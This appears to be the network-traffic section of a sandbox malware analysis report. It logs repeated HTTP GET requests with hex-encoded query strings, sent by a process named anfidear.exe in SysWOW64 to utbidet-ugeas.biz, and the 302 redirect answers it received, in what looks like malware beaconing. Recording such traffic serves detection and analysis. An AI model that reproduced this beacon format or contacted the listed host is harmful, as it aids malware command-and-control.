                                                                                                                                                                    Sep 7, 2024 15:34:12.524724007 CEST161OUTGET /d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:13.008039951 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:12 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.1249743172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:15.180862904 CEST161OUTGET /d/N?020F789C9C0F789C9C3D78B09C0F78BEC01B9C560E0F78AAB23D56A5AE3F48B29C HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:15.678893089 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:15 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020F789C9C0F789C9C3D78B09C0F78BEC01B9C560E0F78AAB23D56A5AE3F48B29C
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.1249745172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:15.821404934 CEST161OUTGET /d/N?02034E0282034E0282314E2E82034E20DE17AAC810034E34AC31603BB0337E2C82 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:16.324598074 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02034E0282034E0282314E2E82034E20DE17AAC810034E34AC31603BB0337E2C82
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.1249747172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:16.638448954 CEST161OUTGET /d/N?0254B08A2254B08A2266B0A62254B0A87E405440B054B0BC0C669EB3106480A422 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:17.134814978 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0254B08A2254B08A2266B0A62254B0A87E405440B054B0BC0C669EB3106480A422
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.1249749172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:17.430860043 CEST161OUTGET /d/N?02F0DEDB8CF0DEDB8CC2DEF78CF0DEF9D0E43A111EF0DEEDA2C2F0E2BEC0EEF58C HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:17.902957916 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F0DEDB8CF0DEDB8CC2DEF78CF0DEF9D0E43A111EF0DEEDA2C2F0E2BEC0EEF58C
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    17192.168.2.1249752172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:19.920839071 CEST161OUTGET /d/N?02D3148868D3148868E114A468D314AA34C7F042FAD314BE46E13AB15AE324A668 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:20.411405087 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02D3148868D3148868E114A468D314AA34C7F042FAD314BE46E13AB15AE324A668
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    18192.168.2.1249754172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:21.852649927 CEST161OUTGET /d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:22.326303959 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:22 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    19192.168.2.1249756172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:22.821368933 CEST161OUTGET /d/N?022411AAF32411AAF3161186F3241188AF30F5606124119CDD163F93C1142184F3 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:23.354423046 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:23 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?022411AAF32411AAF3161186F3241188AF30F5606124119CDD163F93C1142184F3
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    20192.168.2.1249758172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:24.493515015 CEST161OUTGET /d/N?02795EFA49795EFA494B5ED649795ED8156DBA30DB795ECC674B70C37B496ED449 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:24.980220079 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:24 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02795EFA49795EFA494B5ED649795ED8156DBA30DB795ECC674B70C37B496ED449
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    21192.168.2.1249760172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:27.327744007 CEST161OUTGET /d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:27.838116884 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    22192.168.2.1249762172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:27.968214035 CEST161OUTGET /d/N?026431A4996431A49956318899643186C570D56E0B643192B7561F9DAB54018A99 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:28.464566946 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:28 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?026431A4996431A49956318899643186C570D56E0B643192B7561F9DAB54018A99
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    23192.168.2.1249764172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:29.555766106 CEST161OUTGET /d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:30.031708002 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:29 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    24192.168.2.1249766172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:30.514873981 CEST161OUTGET /d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:30.998691082 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:30 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    25192.168.2.1249768172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:31.290249109 CEST161OUTGET /d/N?02343E1A9A343E1A9A063E369A343E38C620DAD008343E2CB4061023A8040E349A HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:31.783400059 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:31 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02343E1A9A343E1A9A063E369A343E38C620DAD008343E2CB4061023A8040E349A
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


